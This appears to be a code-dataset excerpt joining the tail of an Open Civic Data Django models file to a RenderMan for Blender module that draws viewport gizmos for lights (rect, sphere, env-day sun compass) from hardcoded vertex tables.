kwargs['validators'] = [RegexValidator(regex=regex, message=msg, flags=re.U)]
super(OCDIDField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(OCDIDField, self).deconstruct()
if self.ocd_type != 'jurisdiction':
kwargs.pop('default')
kwargs.pop('max_length')
kwargs.pop('primary_key')
kwargs['ocd_type'] = self.ocd_type
return (name, path, args, kwargs)
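# Example (illustrative values only): OCDIDField(ocd_type='person') generates
# defaults such as 'ocd-person/0e1b2c3d-4f5a-6789-abcd-ef0123456789' and its
# validator rejects identifiers that do not match that pattern.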
class OCDBase(models.Model):
""" common base fields across all top-level models """
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
extras = JSONField(default='{}', blank=True)
class Meta:
abstract = True
class RelatedBase(models.Model):
id = UUIDField(auto=True, primary_key=True)
class Meta:
abstract = True
class LinkBase(RelatedBase):
note = models.CharField(max_length=300, blank=True)
url = models.URLField(max_length=2000)
class Meta:
abstract = True
class MimetypeLinkBase(RelatedBase):
media_type = models.CharField(max_length=100)
url = models.URLField(max_length=2000)
class Meta:
abstract = True
class IdentifierBase(RelatedBase):
identifier = models.CharField(max_length=300)
scheme = models.CharField(max_length=300)
class Meta:
abstract = True
class RelatedEntityBase(RelatedBase):
name = models.CharField(max_length=2000)
entity_type = models.CharField(max_length=20, blank=True)
# optionally tied to an organization or person if it was linkable
organization = models.ForeignKey('Organization', null=True)
person = models.ForeignKey('Person', null=True)
@property
def entity_name(self):
if self.entity_type == 'organization' and self.organization_id:
return self.organization.name
elif self.entity_type == 'person' and self.person_id:
return self.person.name
else:
return self.name
@property
def entity_id(self):
if self.entity_type == 'organization':
return self.organization_id
if self.entity_type == 'person':
return self.person_id
return None
class Meta:
abstract = True
| bsd-3-clause | -3,939,492,258,956,639,000 | 29.816514 | 98 | 0.6234 | false |
prman-pixar/RenderManForBlender | rman_ui/rman_ui_light_handlers/__init__.py | 2 | 43288 | import bpy
import gpu
from gpu_extras.batch import batch_for_shader
from ...rfb_utils import transform_utils
from ...rman_constants import RMAN_AREA_LIGHT_TYPES
from .barn_light_filter_draw_helper import BarnLightFilterDrawHelper
from mathutils import Vector, Matrix
import mathutils
import math
_DRAW_HANDLER_ = None
_BARN_LIGHT_DRAW_HELPER_ = None
_PI0_5_ = 1.570796327
s_rmanLightLogo = dict()
s_rmanLightLogo['box'] = [
(-0.5,0.5,0.0),
(-0.5,-0.5,0.0),
(0.5,-0.5,0.0),
(0.5,0.5, 0.0)
]
s_rmanLightLogo['point'] = [
(0.1739199623,0.2189011082,0.0),
(0.2370826019,0.2241208805,0.0),
(0.2889232079,0.180194478,0.0),
(0.2945193948,0.1124769769,0.0),
(0.2505929922,0.06063637093,0.0),
(0.1828754911,0.05504018402,0.0),
(0.1310348852,0.09896658655,0.0),
(0.1254386983,0.1666840877,0.0)
]
s_rmanLightLogo['bouncing_r'] = [
(0.10014534,0.163975795,0.0),
(0.02377454715,0.2079409584,0.0),
(-0.0409057802,0.162414633,0.0),
(-0.09261710117,-0.03967857045,0.0),
(-0.1033546419,-0.3941421577,0.0),
(-0.1714205988,-0.3935548906,0.0),
(-0.1743695606,-0.2185861014,0.0),
(-0.1934162612,-0.001801638764,0.0),
(-0.2387964527,0.228222199,0.0),
(-0.2945193948,0.388358659,0.0),
(-0.2800665961,0.3941421577,0.0),
(-0.1944135703,0.2262313617,0.0),
(-0.1480375743,0.08022936015,0.0),
(-0.09632135301,0.2812304287,0.0),
(0.03260773708,0.3415349284,0.0),
(0.1794274591,0.2497892755,0.0),
(0.10014534,0.163975795,0.0)
]
s_rmanLightLogo['arrow'] = [
(0.03316599252,-6.536167e-18,0.0294362),
(0.03316599252,-7.856030e-17,0.3538041),
(0.06810822842,-7.856030e-17,0.3538041),
(0,-1.11022302e-16,0.5),
(-0.0681082284,-7.85603e-17,0.353804),
(-0.0331659925,-7.85603e-17,0.353804),
(-0.0331659925,-6.53616e-18,0.029436)
]
s_rmanLightLogo['R_outside'] = [
[0.265400, -0.291600, 0.000000],
[0.065400, -0.291600, 0.000000],
[0.065400, -0.125000, 0.000000],
[0.025800, -0.125000, 0.000000],
[0.024100, -0.125000, 0.000000],
[-0.084800, -0.291600, 0.000000],
[-0.305400, -0.291600, 0.000000],
[-0.170600, -0.093300, 0.000000],
[-0.217900, -0.062800, 0.000000],
[-0.254000, -0.023300, 0.000000],
[-0.276900, 0.025800, 0.000000],
[-0.284500, 0.085000, 0.000000],
[-0.284500, 0.086700, 0.000000],
[-0.281200, 0.128700, 0.000000],
[-0.271200, 0.164900, 0.000000],
[-0.254500, 0.196600, 0.000000],
[-0.231000, 0.224900, 0.000000],
[-0.195200, 0.252600, 0.000000],
[-0.149600, 0.273700, 0.000000],
[-0.092000, 0.287100, 0.000000],
[-0.020300, 0.291600, 0.000000],
[0.265400, 0.291600, 0.000000],
[0.265400, -0.291600, 0.000000]
]
s_rmanLightLogo['R_inside'] = [
[0.065400, 0.019100, 0.000000],
[0.065400, 0.133300, 0.000000],
[-0.014600, 0.133300, 0.000000],
[-0.043500, 0.129800, 0.000000],
[-0.065700, 0.119500, 0.000000],
[-0.079800, 0.102100, 0.000000],
[-0.084500, 0.077400, 0.000000],
[-0.084500, 0.075700, 0.000000],
[-0.079800, 0.052000, 0.000000],
[-0.065700, 0.034100, 0.000000],
[-0.043300, 0.022800, 0.000000],
[-0.013800, 0.019100, 0.000000],
[0.065400, 0.019100, 0.000000]
]
s_envday = dict()
s_envday['west_rr_shape'] = [
[-1.9994, 0, -0.1652], [-2.0337, 0, 0.0939],
[-2.0376, 0, 0.1154], [-2.0458, 0, 0.1159],
[-2.046, 0, 0.0952], [-2.0688, 0, -0.2033],
[-2.1958, 0, -0.203], [-2.1458, 0, 0.1705],
[-2.1408, 0, 0.1874], [-2.1281, 0, 0.2],
[-2.1116, 0, 0.2059], [-2.0941, 0, 0.2078],
[-1.9891, 0, 0.2073], [-1.9719, 0, 0.2039],
[-1.9573, 0, 0.1938], [-1.9483, 0, 0.1786],
[-1.9447, 0, 0.1613], [-1.9146, 0, -0.1149],
[-1.9049, 0, -0.1127], [-1.8721, 0, 0.1759],
[-1.8652, 0, 0.1921], [-1.8507, 0, 0.2021],
[-1.8339, 0, 0.2072], [-1.7112, 0, 0.207],
[-1.6943, 0, 0.2024], [-1.6816, 0, 0.1901],
[-1.6744, 0, 0.1742], [-1.6234, 0, -0.2037],
[-1.751, 0, -0.2035], [-1.7748, 0, 0.1153],
[-1.7812, 0, 0.1166], [-1.7861, 0, 0.1043],
[-1.8188, 0, -0.1565], [-1.8218, 0, -0.1738],
[-1.83, 0, -0.1894], [-1.8447, 0, -0.1995],
[-1.8618, 0, -0.2034], [-1.9493, 0, -0.2037],
[-1.967, 0, -0.2024], [-1.9824, 0, -0.1956],
[-1.9943, 0, -0.1825]
]
s_envday['east_rr_shape'] = [
[1.8037, 0, 0.1094], [1.9542, 0, 0.1094],
[1.9604, 0, 0.2004], [1.9175, 0, 0.2043],
[1.8448, 0, 0.2069], [1.7493, 0, 0.2082],
[1.7375, 0, 0.2079], [1.7258, 0, 0.2066],
[1.7144, 0, 0.204], [1.7033, 0, 0.2],
[1.6928, 0, 0.1947], [1.6831, 0, 0.188],
[1.6743, 0, 0.1802], [1.6669, 0, 0.171],
[1.6607, 0, 0.1611], [1.6559, 0, 0.1503],
[1.6527, 0, 0.139], [1.6508, 0, 0.1274],
[1.6502, 0, 0.1156], [1.6502, 0, -0.1122],
[1.6505, 0, -0.1239], [1.6521, 0, -0.1356],
[1.6551, 0, -0.147], [1.6597, 0, -0.1578],
[1.6657, 0, -0.168], [1.6731, 0, -0.1771],
[1.6816, 0, -0.1852], [1.6911, 0, -0.1922],
[1.7014, 0, -0.1978], [1.7124, 0, -0.2021],
[1.7238, 0, -0.205], [1.7354, 0, -0.2066],
[1.7472, 0, -0.207], [1.8528, 0, -0.2058],
[1.9177, 0, -0.2028], [1.9602, 0, -0.1993],
[1.9541, 0, -0.1082], [1.8006, 0, -0.1084],
[1.7892, 0, -0.1054], [1.7809, 0, -0.0968],
[1.7789, 0, -0.0851], [1.7793, 0, -0.0471],
[1.9329, 0, -0.0469], [1.933, 0, 0.0388],
[1.7793, 0, 0.0384], [1.779, 0, 0.0895],
[1.7825, 0, 0.1002], [1.792, 0, 0.1083]
]
s_envday['south_rr_shape'] = [
[0.1585, 0, 1.654], [0.1251, 0, 1.6444],
[0.0918, 0, 1.6383], [0.053, 0, 1.6345],
[0.0091, 0, 1.6331], [-0.0346, 0, 1.6347],
[-0.0712, 0, 1.6397], [-0.1002, 0, 1.6475],
[-0.1221, 0, 1.6587], [-0.142, 0, 1.6791],
[-0.1537, 0, 1.7034], [-0.1579, 0, 1.7244],
[-0.1599, 0, 1.7458], [-0.1593, 0, 1.7672],
[-0.1566, 0, 1.7884], [-0.1499, 0, 1.8088],
[-0.1392, 0, 1.8273], [-0.1249, 0, 1.8433],
[-0.1079, 0, 1.8563], [-0.0894, 0, 1.8675],
[-0.0707, 0, 1.8765], [-0.0139, 0, 1.9013],
[0.0258, 0, 1.9185], [0.041, 0, 1.9287],
[0.0411, 0, 1.939], [0.0366, 0, 1.9485],
[0.0253, 0, 1.9525], [-0.1485, 0, 1.95],
[-0.1566, 0, 2.0398], [-0.1297, 0, 2.0462],
[-0.0876, 0, 2.0538], [-0.0451, 0, 2.0585],
[-0.0024, 0, 2.0603], [0.0403, 0, 2.0591],
[0.0827, 0, 2.0534], [0.1231, 0, 2.0397],
[0.1537, 0, 2.0102], [0.168, 0, 1.97],
[0.1706, 0, 1.9273], [0.1631, 0, 1.8852],
[0.1404, 0, 1.8491], [0.106, 0, 1.8236],
[0.0875, 0, 1.8137], [-0.0136, 0, 1.7711],
[-0.0244, 0, 1.7643], [-0.0309, 0, 1.7558],
[-0.031, 0, 1.7462], [-0.0261, 0, 1.7393],
[-0.0124, 0, 1.7353], [0.1505, 0, 1.7366]
]
s_envday['north_rr_shape'] = [
[-0.144, 0, -2.034], [-0.1584, 0, -2.0323],
[-0.1719, 0, -2.0256], [-0.1804, 0, -2.0136],
[-0.1848, 0, -1.9996], [-0.185, 0, -1.9849],
[-0.185, 0, -1.6235], [-0.0661, 0, -1.6236],
[-0.0663, 0, -1.8158], [-0.0672, 0, -1.8303],
[-0.0702, 0, -1.8594], [-0.0721, 0, -1.8739],
[-0.0654, 0, -1.8569], [-0.048, 0, -1.8169],
[-0.0415, 0, -1.8038], [0.0554, 0, -1.65],
[0.0641, 0, -1.638], [0.0747, 0, -1.6286],
[0.0869, 0, -1.6244], [0.0978, 0, -1.6235],
[0.1541, 0, -1.6238], [0.1677, 0, -1.6263],
[0.1811, 0, -1.6341], [0.1896, 0, -1.6477],
[0.1926, 0, -1.6633], [0.1927, 0, -1.6662],
[0.1927, 0, -2.0339], [0.0743, 0, -2.0341],
[0.0743, 0, -1.8646], [0.0759, 0, -1.8354],
[0.0786, 0, -1.8062], [0.0803, 0, -1.7917],
[0.0735, 0, -1.8051], [0.0605, 0, -1.8312],
[0.0473, 0, -1.8573], [0.0422, 0, -1.8659],
[-0.0534, 0, -2.0154], [-0.0632, 0, -2.0261],
[-0.0741, 0, -2.0322], [-0.0909, 0, -2.034]
]
s_envday['inner_circle_rr_shape'] = [
[0, 0, -1], [-0.1961, 0, -0.9819],
[-0.3822, 0, -0.9202], [-0.5587, 0, -0.8291],
[-0.7071, 0, -0.707], [-0.8308, 0, -0.5588],
[-0.9228, 0, -0.3822], [-0.9811, 0, -0.1961],
[-1.0001, 0, 0], [-0.9811, 0, 0.1961],
[-0.9228, 0, 0.3822], [-0.8361, 0, 0.5486],
[-0.7071, 0, 0.7071], [-0.5587, 0, 0.8311],
[-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811],
[0, 0, 1.0001], [0.1961, 0, 0.981],
[0.3822, 0, 0.9228], [0.5587, 0, 0.8309],
[0.7071, 0, 0.7071], [0.8282, 0, 0.5587],
[0.9228, 0, 0.3822], [0.9811, 0, 0.1961],
[1.0001, 0, 0], [0.9811, 0, -0.1961],
[0.9228, 0, -0.3822], [0.831, 0, -0.5587],
[0.7071, 0, -0.7071], [0.5587, 0, -0.8308],
[0.3822, 0, -0.9228], [0.1961, 0, -0.981]
]
s_envday['outer_circle_rr_shape'] = [
[0, 0, -1], [-0.1961, 0, -0.9815],
[-0.3822, 0, -0.9202], [-0.5587, 0, -0.8288],
[-0.7071, 0, -0.707], [-0.8282, 0, -0.5588],
[-0.9228, 0, -0.3822], [-0.981, 0, -0.1961],
[-1.0001, 0, 0], [-0.981, 0, 0.1961],
[-0.9228, 0, 0.3822], [-0.8308, 0, 0.5538],
[-0.7071, 0, 0.7071], [-0.5587, 0, 0.8302],
[-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811],
[0, 0, 1.0001], [0.1961, 0, 0.981],
[0.3822, 0, 0.9228], [0.5587, 0, 0.8279],
[0.7071, 0, 0.7071], [0.8308, 0, 0.5587],
[0.9228, 0, 0.3822], [0.981, 0, 0.1961],
[1.0001, 0, 0], [0.981, 0, -0.1961],
[0.9228, 0, -0.3822], [0.8308, 0, -0.5587],
[0.7071, 0, -0.7071], [0.5587, 0, -0.8308],
[0.3822, 0, -0.9228], [0.1961, 0, -0.9784]
]
s_envday['compass_shape'] = [
[0, 0, -0.9746], [-0.2163, 0, -0.0012],
[0, 0, 0.9721], [0.2162, 0, -0.0012],
[0, 0, -0.9746]
]
s_envday['east_arrow_shape'] = [
[1.2978, 0, -0.2175], [1.2978, 0, 0.215],
[1.5141, 0, -0.0012], [1.2978, 0, -0.2175]
]
s_envday['south_arrow_shape'] = [
[-0.2163, 0, 1.2965], [0.2162, 0, 1.2965],
[0, 0, 1.5128], [-0.2163, 0, 1.2965]
]
s_envday['west_arrow_shape'] = [
[-1.2979, 0, -0.2175], [-1.2979, 0, 0.215],
[-1.5142, 0, -0.0012], [-1.2979, 0, -0.2175]
]
s_envday['north_arrow_shape'] = [
[-0.2163, 0, -1.2991], [0.2162, 0, -1.2991],
[0, 0, -1.5154], [-0.2163, 0, -1.2991]
]
s_diskLight = [
[0.490300, 0.097500, 0.000000],
[0.461900, 0.191300, 0.000000],
[0.415700, 0.277700, 0.000000],
[0.353500, 0.353500, 0.000000],
[0.277700, 0.415700, 0.000000],
[0.191300, 0.461900, 0.000000],
[0.097500, 0.490300, 0.000000],
[0.000000, 0.499900, 0.000000],
[-0.097500, 0.490300, 0.000000],
[-0.191300, 0.461900, 0.000000],
[-0.277700, 0.415700, 0.000000],
[-0.353500, 0.353500, 0.000000],
[-0.415700, 0.277700, 0.000000],
[-0.461900, 0.191300, 0.000000],
[-0.490300, 0.097500, 0.000000],
[-0.499900, 0.000000, 0.000000],
[-0.490300, -0.097500, 0.000000],
[-0.461900, -0.191300, 0.000000],
[-0.415700, -0.277700, 0.000000],
[-0.353500, -0.353500, 0.000000],
[-0.277700, -0.415700, 0.000000],
[-0.191300, -0.461900, 0.000000],
[-0.097500, -0.490300, 0.000000],
[0.000000, -0.499900, 0.000000],
[0.097500, -0.490300, 0.000000],
[0.191300, -0.461900, 0.000000],
[0.277700, -0.415700, 0.000000],
[0.353500, -0.353500, 0.000000],
[0.415700, -0.277700, 0.000000],
[0.461900, -0.191300, 0.000000],
[0.490300, -0.097500, 0.000000],
[0.500000, 0.000000, 0.000000],
[0.490300, 0.097500, 0.000000]
]
s_distantLight = dict()
s_distantLight['arrow1'] = [
(0.03316599252,-6.536167e-18,0.0294362),
(0.03316599252,-7.856030e-17,0.5),
(0.06810822842,-7.856030e-17,0.5),
(0,-1.11022302e-16, 1.0),
(-0.0681082284,-7.85603e-17,0.5),
(-0.0331659925,-7.85603e-17,0.5),
(-0.0331659925,-6.53616e-18,0.029436)
]
s_distantLight['arrow2'] = [
(0.03316599252,-0.5,0.0294362),
(0.03316599252,-0.5,0.5),
(0.06810822842,-0.5,0.5),
(0,-0.5, 1.0),
(-0.0681082284,-0.5,0.5),
(-0.0331659925,-0.5,0.5),
(-0.0331659925,-0.5,0.029436)
]
s_distantLight['arrow3'] = [
(0.03316599252,0.5,0.0294362),
(0.03316599252,0.5,0.5),
(0.06810822842,0.5,0.5),
(0,0.5, 1.0),
(-0.0681082284,0.5,0.5),
(-0.0331659925,0.5,0.5),
(-0.0331659925,0.5,0.029436)
]
s_portalRays = [
(-1, 0, 0),
(-2, 0, 0),
(-1, 0, 0),
(-1, 0, -1),
(-2, 0, -2),
(-1, 0, -1),
( 0, 0, -1),
( 0, 0, -2),
( 0, 0, -1),
( 1, 0, -1),
( 2, 0, -2),
( 1, 0, -1),
( 1, 0, 0),
( 2, 0, 0),
( 1, 0, 0),
( 1, 0, 1),
( 2, 0, 2),
( 1, 0, 1),
( 0, 0, 1),
( 0, 0, 2),
( 0, 0, 1),
(-1, 0, 1),
(-2, 0, 2),
(-1, 0, 1),
(-1, 0, 0)
]
s_cylinderLight = dict()
s_cylinderLight['vtx'] = [
[-0.5, -0.4045, -0.2938],
[-0.5, -0.1545, -0.4755],
[-0.5, 0.1545, -0.4755],
[-0.5, 0.4045, -0.2938],
[-0.5, 0.5, 0],
[-0.5, 0.4045, 0.2938],
[-0.5, 0.1545, 0.4755],
[-0.5, -0.1545, 0.4755],
[-0.5, -0.4045, 0.2938],
[-0.5, -0.5, 0],
[-0.5, -0.4045, -0.2938],
[0.5, -0.4045, -0.2938],
[0.5, -0.1545, -0.4755],
[0.5, 0.1545, -0.4755],
[0.5, 0.4045, -0.2938],
[0.5, 0.5, 0],
[0.5, 0.4045, 0.2938],
[0.5, 0.1545, 0.4755],
[0.5, -0.1545, 0.4755],
[0.5, -0.4045, 0.2938],
[0.5, -0.5, 0],
[0.5, -0.4045, -0.2938]
]
s_cylinderLight['indices'] = [
(0, 1),
(1, 2),
(2, 3),
(3, 4),
(4, 5),
(5, 6),
(6, 7),
(7, 8),
(8, 9),
(9, 10),
(11, 12),
(12, 13),
(13, 14),
(14, 15),
(15, 16),
(16, 17),
(17, 18),
(18, 19),
(19, 20),
(20, 21),
(0, 11),
(2, 13),
(4, 15),
(6, 17),
(8, 19)
]
_SHADER_ = None
if not bpy.app.background:
_SHADER_ = gpu.shader.from_builtin('3D_UNIFORM_COLOR')
_SELECTED_COLOR_ = (1, 1, 1)
_WIRE_COLOR_ = (0, 0, 0)
if 'Default' in bpy.context.preferences.themes:
_SELECTED_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.object_active
_WIRE_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.wire
def set_selection_color(ob):
global _SELECTED_COLOR_, _WIRE_COLOR_
if ob in bpy.context.selected_objects:
col = (_SELECTED_COLOR_[0], _SELECTED_COLOR_[1], _SELECTED_COLOR_[2], 1)
else:
col = (_WIRE_COLOR_[0], _WIRE_COLOR_[1], _WIRE_COLOR_[2], 1)
_SHADER_.uniform_float("color", col)
def _get_indices(l):
indices = []
for i in range(0, len(l)):
if i == len(l)-1:
indices.append((i, 0))
else:
indices.append((i, i+1))
return indices
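# For example, _get_indices([a, b, c]) returns [(0, 1), (1, 2), (2, 0)]: the
# edge index pairs of a closed polyline through the given points.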
def _get_sun_direction(ob):
light = ob.data
rm = light.renderman.get_light_node()
m = Matrix.Identity(4)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
month = float(rm.month)
day = float(rm.day)
year = float(rm.year)
hour = float(rm.hour)
zone = rm.zone
latitude = rm.latitude
longitude = rm.longitude
sunDirection = Vector([rm.sunDirection[0], rm.sunDirection[1], rm.sunDirection[2]])
if month == 0.0:
return sunDirection
if month == 1.0:
dayNumber = day
elif month == 2.0:
dayNumber = day + 31.0
else:
year_mod = 0.0
if math.fmod(year, 4.0) != 0.0:
year_mod = 0.0
elif math.fmod(year, 100.0) != 0.0:
year_mod = 1.0
elif math.fmod(year, 400.0) != 0.0:
year_mod = 0.0
else:
year_mod = 1.0
dayNumber = math.floor(30.6 * month - 91.4) + day + 59.0 + year_mod
    # Fractional "day angle" over the year, shifted so day ~81 (the March
    # equinox) maps to zero.
    dayAngle = 2.0 * math.pi * float(dayNumber - 81.0 + (hour - zone) / 24.0) / 365.0
    # Longitude correction (4 minutes per degree) plus the standard
    # equation-of-time approximation, in minutes.
    timeCorrection = 4.0 * (longitude - 15.0 * zone) + 9.87 * math.sin(2.0 * dayAngle) - 7.53 * math.cos(1.0 * dayAngle) - 1.50 * math.sin(1.0 * dayAngle)
    # Hour angle of the sun in radians; zero at solar noon.
    hourAngle = math.radians(15.0) * (hour + timeCorrection / 60.0 - 12.0)
    # Solar declination, then elevation and azimuth for the given latitude.
    declination = math.asin(math.sin(math.radians(23.45)) * math.sin(dayAngle))
    elevation = math.asin(math.sin(declination) * math.sin(math.radians(latitude)) + math.cos(declination) * math.cos(math.radians(latitude)) * math.cos(hourAngle))
    azimuth = math.acos((math.sin(declination) * math.cos(math.radians(latitude)) - math.cos(declination) * math.sin(math.radians(latitude)) * math.cos(hourAngle)) / math.cos(elevation))
if hourAngle > 0.0:
azimuth = 2.0 * math.pi - azimuth
sunDirection[0] = math.cos(elevation) * math.sin(azimuth)
sunDirection[1] = max(math.sin(elevation), 0)
sunDirection[2] = math.cos(elevation) * math.cos(azimuth)
return m @ sunDirection
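# Sanity check on the formulas above: at an equinox declination is ~0, so at
# latitude 0 and hourAngle 0 (solar noon) elevation evaluates to ~pi/2 and
# sunDirection is approximately (0, 1, 0) before the final matrix is applied.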
def make_sphere(m):
    """Return points tracing a wireframe sphere of radius 0.5 (meridians
    followed by latitude rings), each transformed by the matrix m."""
lats = 12
longs = 20
radius = 0.5
v = []
i = 0
j = 0
for j in range(0, longs+1):
lng = 2 * math.pi * float (j / longs)
x = math.cos(lng)
y = math.sin(lng)
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i/ lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
v.append( m @ Vector((x*zr0, y*zr0, z0)))
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i / lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
v.append( m @ Vector((-x*zr0, -y*zr0, z0)))
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i / lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
for j in range(0, longs+1):
lng = 2 * math.pi * (float(j / longs))
x = math.cos(lng)
y = math.sin(lng)
v.append( m @ Vector((x*zr0, y*zr0, z0)))
return v
def draw_rect_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
box = []
for pt in s_rmanLightLogo['box']:
box.append( m @ Vector(pt))
box_indices = _get_indices(s_rmanLightLogo['box'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box}, indices=box_indices)
batch.draw(_SHADER_)
arrow = []
for pt in s_rmanLightLogo['arrow']:
arrow.append( m @ Vector(pt))
arrow_indices = _get_indices(s_rmanLightLogo['arrow'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_sphere_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_envday_light(ob):
_SHADER_.bind()
set_selection_color(ob)
loc, rot, sca = Matrix(ob.matrix_world).decompose()
axis,angle = rot.to_axis_angle()
scale = max(sca) # take the max axis
m = Matrix.Translation(loc)
m = m @ Matrix.Rotation(angle, 4, axis)
m = m @ Matrix.Scale(scale, 4)
ob_matrix = m
m = Matrix(ob_matrix)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
west_rr_shape = []
for pt in s_envday['west_rr_shape']:
west_rr_shape.append( m @ Vector(pt))
west_rr_indices = _get_indices(s_envday['west_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_rr_shape}, indices=west_rr_indices)
batch.draw(_SHADER_)
east_rr_shape = []
for pt in s_envday['east_rr_shape']:
east_rr_shape.append( m @ Vector(pt))
east_rr_indices = _get_indices(s_envday['east_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_rr_shape}, indices=east_rr_indices)
batch.draw(_SHADER_)
south_rr_shape = []
for pt in s_envday['south_rr_shape']:
south_rr_shape.append( m @ Vector(pt))
south_rr_indices = _get_indices(s_envday['south_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_rr_shape}, indices=south_rr_indices)
batch.draw(_SHADER_)
north_rr_shape = []
for pt in s_envday['north_rr_shape']:
north_rr_shape.append( m @ Vector(pt) )
north_rr_indices = _get_indices(s_envday['north_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_rr_shape}, indices=north_rr_indices)
batch.draw(_SHADER_)
inner_circle_rr_shape = []
for pt in s_envday['inner_circle_rr_shape']:
inner_circle_rr_shape.append( m @ Vector(pt) )
inner_circle_rr_shape_indices = _get_indices(s_envday['inner_circle_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": inner_circle_rr_shape}, indices=inner_circle_rr_shape_indices)
batch.draw(_SHADER_)
outer_circle_rr_shape = []
for pt in s_envday['outer_circle_rr_shape']:
outer_circle_rr_shape.append( m @ Vector(pt) )
outer_circle_rr_shape_indices = _get_indices(s_envday['outer_circle_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": outer_circle_rr_shape}, indices=outer_circle_rr_shape_indices)
batch.draw(_SHADER_)
compass_shape = []
for pt in s_envday['compass_shape']:
compass_shape.append( m @ Vector(pt))
compass_shape_indices = _get_indices(s_envday['compass_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": compass_shape}, indices=compass_shape_indices)
batch.draw(_SHADER_)
east_arrow_shape = []
for pt in s_envday['east_arrow_shape']:
east_arrow_shape.append( m @ Vector(pt))
east_arrow_shape_indices = _get_indices(s_envday['east_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_arrow_shape}, indices=east_arrow_shape_indices)
batch.draw(_SHADER_)
west_arrow_shape = []
for pt in s_envday['west_arrow_shape']:
west_arrow_shape.append( m @ Vector(pt) )
west_arrow_shape_indices = _get_indices(s_envday['west_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_arrow_shape}, indices=west_arrow_shape_indices)
batch.draw(_SHADER_)
north_arrow_shape = []
for pt in s_envday['north_arrow_shape']:
north_arrow_shape.append( m @ Vector(pt))
north_arrow_shape_indices = _get_indices(s_envday['north_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_arrow_shape}, indices=north_arrow_shape_indices)
batch.draw(_SHADER_)
south_arrow_shape = []
for pt in s_envday['south_arrow_shape']:
south_arrow_shape.append( m @ Vector(pt))
south_arrow_shape_indices = _get_indices(s_envday['south_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_arrow_shape}, indices=south_arrow_shape_indices)
batch.draw(_SHADER_)
sunDirection = _get_sun_direction(ob)
sunDirection = Matrix(ob_matrix) @ Vector(sunDirection)
origin = Matrix(ob_matrix) @ Vector([0,0,0])
sunDirection_pts = [ origin, sunDirection]
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sunDirection_pts}, indices=[(0,1)])
batch.draw(_SHADER_)
# draw a sphere to represent the sun
v = sunDirection - origin
translate = Matrix.Translation(v)
sphere = make_sphere(ob_matrix @ Matrix.Scale(0.25, 4))
    sphere_indices = _get_indices(sphere)
sphere_shape = []
for pt in sphere:
sphere_shape.append( translate @ Vector(pt) )
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere_shape}, indices=sphere_indices)
